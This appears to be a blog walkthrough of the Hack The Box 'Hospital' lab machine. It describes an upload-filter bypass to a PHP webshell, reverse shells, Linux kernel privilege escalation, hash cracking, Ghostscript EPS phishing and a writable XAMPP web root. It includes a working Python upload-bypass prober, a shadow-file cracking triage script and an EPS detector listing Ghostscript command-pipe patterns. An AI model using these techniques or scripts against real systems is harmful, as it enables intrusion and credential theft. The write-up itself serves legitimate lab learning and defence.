In this post, I would like to share a walkthrough of the Hospital machine from Hack The Box.
It is rated as a medium machine on Hack The Box.

What will you gain from the Hospital machine?
For the user flag, you must bypass the upload filter of the web application and work around PHP's disabled functions to get a PHP webshell on the Linux virtual machine and execute commands. I will elevate privileges using kernel exploits, demonstrating both CVE-2023-35001 and GameOver(lay). With root on the web server, I'll crack the password hash of a local user, obtaining credentials that also work on the Windows host and on the RoundCube webmail. Within the mailbox, I'll reply to another user who is expecting an EPS file, exploiting a vulnerability in Ghostscript to get code execution as that user.
For the root flag, the XAMPP installation on the Windows host has lax directory permissions, so a one-line PHP file dropped into its web root runs under the account that serves the HTTPS site. The Ghostscript phishing step itself only works because automation on the box opens the attachment we send.
For those who want to learn or improve their cybersecurity skills, especially red teaming and blue teaming, you can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me.
The Academy link can be found at https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvv
Information Gathering on Hospital Machine
Once the VPN connection is up (the configuration file is downloaded from Hack The Box), information gathering starts with an nmap scan of the machine. The scan below uses default scripts (-sC) and version detection (-sV) against nmap's default top 1000 ports, which is why 979 ports are reported as filtered; a full-port scan (nmap -p- <IP Address>) is worth running afterwards, since anything listening outside that range would be missed.
┌─[darknite@parrot]─[~/Documents/htb/hospital]
└──╼ $ nmap -sC -sV 10.10.11.241 -oA intial
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-19 06:28 EST
Nmap scan report for 10.10.11.241
Host is up (0.30s latency).
Not shown: 979 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e14b4b3a6d18666939f7aa74b3160aaa (ECDSA)
|_ 256 96c1dcd8972095e7015f20a24361cbca (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-19 18:28:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after: 2024-03-06T18:39:34
| rdp-ntlm-info:
| Target_Name: HOSPITAL
| NetBIOS_Domain_Name: HOSPITAL
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hospital.htb
| DNS_Computer_Name: DC.hospital.htb
| DNS_Tree_Name: hospital.htb
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-19T18:29:30+00:00
6646/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.55 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-11-19T18:29:30
|_ start_date: N/A
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.04 seconds
┌─[darknite@parrot]─[~/Documents/htb/hospital]
└──╼ $
Two things stand out in the scan. Port 443 is Apache 2.4.56 (Win64) on the Windows domain controller DC.hospital.htb, serving "Hospital Webmail", while port 8080 is Apache 2.4.55 (Ubuntu): the Service Info line lists both Linux and Windows, so the application on 8080 lives on a separate Linux system. The clock skew of roughly seven hours against the DC would matter if we later talk Kerberos to it, but the web application on 8080 is the first target. Let's access that website.


It redirects us to a login page (login.php).

Therefore, let's register a new account on the website.

Once logged in, the application asks us to upload a file.

Let's upload an arbitrary file first.

The upload of the random file succeeds.

The uploaded file is served back to anyone who knows its path, which turns the upload into a code-execution primitive if we can get PHP code stored there.

First, we upload a file containing a phpinfo() call, under a name that gets past the extension filter.

We retrieve the phpinfo output, which confirms the file is executed as PHP. It is worth reading the disable_functions line in that output: it lists the command-execution functions the server blocks, which is what the one-line shell has to work around.

Next, we upload a single-line PHP webshell.

With that, we have command execution on the web server.
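The upload and phpinfo steps above can be scripted. The following is an added example written for this walkthrough, not code from the original post: it uploads a phpinfo() file under several filenames that commonly evade a ".php" denylist, fetches each one back to see whether it executes, and parses disable_functions so you know which execution functions a one-line shell can still call. The upload endpoint (/upload.php), the form field name (image) and the upload directory (/uploads/) are assumptions; the host and port come from the nmap scan.

```python
"""Upload-filter probe plus phpinfo() triage.

Added example for this walkthrough, not code from the original post. The endpoint,
form field and upload directory are assumptions (edit them for the target); the host
and port come from the nmap output. Pass your PHPSESSID cookie as argv[1].
"""
import re
import sys
import urllib.error
import urllib.request
import uuid

BASE = "http://10.10.11.241:8080"   # Ubuntu Apache from the nmap scan
UPLOAD_PATH = "/upload.php"          # assumption
FIELD = "image"                      # assumption: name of the file input
UPLOAD_DIR = "/uploads/"             # assumption: where stored files are served from

PHPINFO = b"<?php phpinfo(); ?>"
EXEC_FUNCTIONS = ["system", "exec", "shell_exec", "passthru",
                  "popen", "proc_open", "pcntl_exec"]


def candidate_filenames(stem: str) -> list[str]:
    """Filename variants that commonly slip past a denylist that only blocks '.php'."""
    exts = ["php", "phar", "phtml", "php5", "php7", "phps", "pht"]
    names = [f"{stem}.{e}" for e in exts]
    names += [f"{stem}.{e.upper()}" for e in exts]          # case-sensitive denylists
    names += [f"{stem}.jpg.{e}" for e in ("php", "phar")]   # double extension
    return names


def build_multipart(field: str, filename: str, content: bytes) -> tuple[bytes, str]:
    """Hand-rolled multipart/form-data body so only the standard library is needed."""
    boundary = uuid.uuid4().hex
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            "Content-Type: image/jpeg\r\n\r\n").encode()   # claim an image MIME type
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


def parse_disable_functions(phpinfo_text: str) -> set[str]:
    """Extract disable_functions from phpinfo() output (HTML table or CLI text)."""
    m = re.search(r'disable_functions</td>\s*<td[^>]*>(.*?)</td>', phpinfo_text, re.S)
    if not m:
        m = re.search(r'disable_functions\s*=>\s*([^=\n]*?)\s*=>', phpinfo_text)
    if not m:
        return set()
    raw = re.sub(r"<[^>]+>", "", m.group(1)).strip()   # drop any tags inside the cell
    if raw in ("", "no value"):
        return set()
    return {f.strip() for f in raw.split(",") if f.strip()}


def usable_exec_functions(disabled: set[str]) -> list[str]:
    """Command-execution functions a one-line shell can still call."""
    return [f for f in EXEC_FUNCTIONS if f not in disabled]


def probe(session_cookie: str) -> dict[str, str]:
    """Upload each candidate name, then fetch it back and see whether PHP ran."""
    stem = uuid.uuid4().hex[:8]
    results = {}
    for name in candidate_filenames(stem):
        body, ctype = build_multipart(FIELD, name, PHPINFO)
        req = urllib.request.Request(
            BASE + UPLOAD_PATH, data=body, method="POST",
            headers={"Content-Type": ctype, "Cookie": session_cookie})
        try:
            urllib.request.urlopen(req, timeout=10).read()
        except urllib.error.URLError as exc:
            results[name] = f"upload failed: {exc}"
            continue
        try:
            resp = urllib.request.urlopen(BASE + UPLOAD_DIR + name, timeout=10)
            page = resp.read().decode(errors="replace")
        except urllib.error.URLError as exc:
            results[name] = f"not reachable after upload: {exc}"
            continue
        if "PHP Version" in page:                       # phpinfo rendered, so code ran
            disabled = parse_disable_functions(page)
            results[name] = (f"EXECUTES; disabled={sorted(disabled)}; "
                             f"usable={usable_exec_functions(disabled)}")
        else:
            results[name] = "stored but served as a plain file"
    return results


if __name__ == "__main__":
    cookie = sys.argv[1] if len(sys.argv) > 1 else ""
    for name, verdict in probe(cookie).items():
        print(f"{name:24} {verdict}")
```

Run with a valid PHPSESSID cookie it prints one verdict per filename. Only names marked EXECUTES are useful, and if the usable list is empty every exec function is blocked, which means a plain system() one-liner will not work and a disable_functions bypass is needed.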

Using the webshell, we send a reverse shell payload; the request is easiest to craft and replay in Burp Suite.

Once the payload runs, the request looks like the one captured in Burp Suite.

Finally, we catch the shell connection on our attacker machine.

Next, we run a kernel exploit to escalate to root on the Linux VM; as mentioned in the introduction, both CVE-2023-35001 and GameOver(lay) work on this kernel.

As root, we notice a password hash for the local user drwilliams.

Let's start cracking the hash.

After a while, we recover drwilliams's password.
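Before throwing the hash at a cracker it is worth triaging the whole shadow file. The script below is an added example for this walkthrough, not the author's tooling; it assumes the drwilliams hash was read from /etc/shadow after getting root on the Linux VM, and the shadow lines embedded in it are constructed (the hash strings are not real). It classifies each entry by its modular-crypt prefix, maps it to the hashcat -m value and john --format, flags accounts locked with passwd -l whose hash is nonetheless still present, and writes a user:hash file for hashcat --username.

```python
"""Shadow-file triage before cracking: which entries carry a crackable hash and
which hashcat/john mode each one needs.

Added example for this walkthrough, not the author's tooling. It assumes the hash for
drwilliams came from /etc/shadow once we were root on the Linux VM. The sample shadow
lines below are constructed and the hash strings are not real.
"""
import sys

# modular-crypt prefix -> (algorithm, hashcat -m, john --format)
HASH_TYPES = {
    "$1$": ("md5crypt", "500", "md5crypt"),
    "$2a$": ("bcrypt", "3200", "bcrypt"),
    "$2b$": ("bcrypt", "3200", "bcrypt"),
    "$2y$": ("bcrypt", "3200", "bcrypt"),
    "$5$": ("sha256crypt", "7400", "sha256crypt"),
    "$6$": ("sha512crypt", "1800", "sha512crypt"),
    "$y$": ("yescrypt", None, "crypt"),   # no hashcat mode; john goes through libc crypt()
}

# Constructed sample: shape of a real shadow file, fake hash material.
SAMPLE_SHADOW = """\
root:$6$EXAMPLESALT$constructedconstructedconstructedconstructedconstructedconstructedconstructedconst:19600:0:99999:7:::
daemon:*:19500:0:99999:7:::
drwilliams:$6$ANOTHERSALT$constructedconstructedconstructedconstructedconstructedconstructedconstructedcons:19600:0:99999:7:::
backup:!$6$LOCKEDSALT$constructedconstructedconstructedconstructedconstructedconstructedconstructedconstr:19600:0:99999:7:::
newuser:$y$j9T$CONSTRUCTEDSALT$constructedconstructedconstructedconstructedco:19600:0:99999:7:::
nobody:!:19500:0:99999:7:::
"""


def classify_hash(h: str):
    """Return (algorithm, hashcat_mode, john_format) for a modular-crypt string, else None."""
    for prefix, info in HASH_TYPES.items():
        if h.startswith(prefix):
            return info
    return None


def triage_shadow(text: str) -> list[dict]:
    """One record per shadow line: user, status, hash (if any) and cracking modes."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, field = fields[0], fields[1]
        # 'passwd -l' prefixes the existing hash with '!': the account is locked for
        # login, but the hash is still there and still crackable.
        locked = field.startswith(("!", "*"))
        core = field.lstrip("!")
        info = classify_hash(core)
        if field == "":
            status = "no password set"
        elif info is None:
            status = "locked, no hash" if locked else "unrecognised hash format"
        else:
            status = "locked but hash present" if locked else "crackable"
        records.append({
            "user": user,
            "status": status,
            "hash": core if info else None,
            "algorithm": info[0] if info else None,
            "hashcat_mode": info[1] if info else None,
            "john_format": info[2] if info else None,
        })
    return records


def crack_input_lines(records: list[dict]) -> list[str]:
    """user:hash lines for every usable hash; feed them to hashcat --username or john."""
    return [f"{r['user']}:{r['hash']}" for r in records if r["hash"]]


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SHADOW
    recs = triage_shadow(text)
    for r in recs:
        print(f"{r['user']:12} {r['status']:26} {r['algorithm'] or '-':12} "
              f"hashcat -m {r['hashcat_mode'] or '-':5} john --format={r['john_format'] or '-'}")
    with open("hashes.txt", "w") as fh:
        fh.write("\n".join(crack_input_lines(recs)) + "\n")
    print("wrote hashes.txt; e.g. hashcat -m 1800 --username hashes.txt rockyou.txt")
```

Run against a copied shadow file it prints the triage table and writes hashes.txt; the suggested hashcat line is for the $6$ entries, and a $y$ (yescrypt) entry has to go to john instead because hashcat has no mode for it.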

We can switch from root to drwilliams with the credentials we just recovered.

Sadly, there is no user flag in drwilliams's home directory.

After some thought, I remembered the other web interface, the Hospital Webmail on port 443, which also asks for credentials. Surprisingly, drwilliams's password works there as well.

There is one unread email that mentions a vulnerability in Ghostscript; the sender is waiting for an EPS file.

Let's download the exploit script to our attacker machine.

We run the Python script to produce the EPS attachment carrying our payload.

Let's start our listener.

Let's reply to the email with the attachment that will give us a connection back.

After a while, we obtain a shell as drbrown.
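The defensive counterpart of this step is a check that an EPS attachment never reaches Ghostscript unless it looks like a plain drawing. The scanner below is an added example, not code from the original post or from the exploit script used here; both embedded EPS files are constructed, and the "bad" one only has the shape a detector should catch, not the payload from the box. It flags Ghostscript's %pipe% device, OutputFile redirection and the file/run/deletefile/renamefile operators on non-comment lines, checks the EPS header and BoundingBox, and reports a verdict per file.

```python
"""Static triage of an EPS attachment before anything renders it.

Added example for this walkthrough, not code from the original post or from the
exploit script it uses. Both sample files are constructed; the 'bad' one only shows
the shape a detector should catch, not the payload from the box.
"""
import re
import sys

# (regex, why it matters). A benign EPS draws things; it has no reason to touch
# devices, external files or other programs.
SUSPICIOUS = [
    (r"%pipe%", "Ghostscript %pipe% device: the text after it is run as a command"),
    (r"OutputFile", "OutputFile redirection: the job chooses where output is written"),
    (r"\bfile\b", "file operator: opens an arbitrary path"),
    (r"\b(?:deletefile|renamefile)\b", "file system modification"),
    (r"\brun\b", "run operator: executes another PostScript file"),
]

# Constructed samples (not from the box).
BENIGN_EPS = b"""%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 100 100
%%EndComments
newpath 10 10 moveto 90 90 lineto stroke
showpage
"""

BAD_EPS = b"""%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 100 100
%%EndComments
(%pipe%echo constructed-sample) (w) file
showpage
"""


def scan_eps(data: bytes) -> dict:
    """Return {'verdict': ok|review|quarantine, 'findings': [(kind, why, lineno)]}."""
    text = data.decode("latin-1")        # PostScript is byte-oriented; latin-1 never fails
    lines = text.splitlines()
    findings = []
    first = lines[0] if lines else ""
    if not first.startswith("%!PS"):
        findings.append(("structure", "missing %!PS header", 1))
    elif "EPSF" not in first:
        findings.append(("structure", "PostScript but not marked EPSF", 1))
    if not any(l.startswith("%%BoundingBox:") for l in lines):
        findings.append(("structure", "no %%BoundingBox comment", 0))
    for lineno, line in enumerate(lines, 1):
        if line.startswith("%"):
            continue                      # comment / DSC line: not executed
        for pattern, why in SUSPICIOUS:
            if re.search(pattern, line):
                findings.append(("content", why, lineno))
    if any(kind == "content" for kind, _, _ in findings):
        verdict = "quarantine"
    elif findings:
        verdict = "review"
    else:
        verdict = "ok"
    return {"verdict": verdict, "findings": findings}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            result = scan_eps(fh.read())
    else:
        result = scan_eps(BAD_EPS)
    print(result["verdict"])
    for kind, why, lineno in result["findings"]:
        print(f"  line {lineno}: [{kind}] {why}")
```

A static scan is a cheap filter, not a guarantee: PostScript strings can be assembled at runtime and split across lines, so the real control is to render untrusted EPS only inside a sandbox (or not at all) and to keep Ghostscript current.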


We can read the user flag with the "type user.txt" command.
Escalate to Root Privileges Access

Inside the xampp directory on the Windows host, the directory permissions are far more permissive than they should be.

The listing also shows the .htaccess in the XAMPP web root.

As a result, we can drop a one-line PHP file into that web root, where the Apache instance on port 443 will execute it.

Requesting the file shows which account the web server runs as and what privileges it holds. The same file can be used to send a reverse shell back to us.

Finally, the reverse shell connects back to us.


We can read the root flag with the "type root.txt" command.
Extra Information

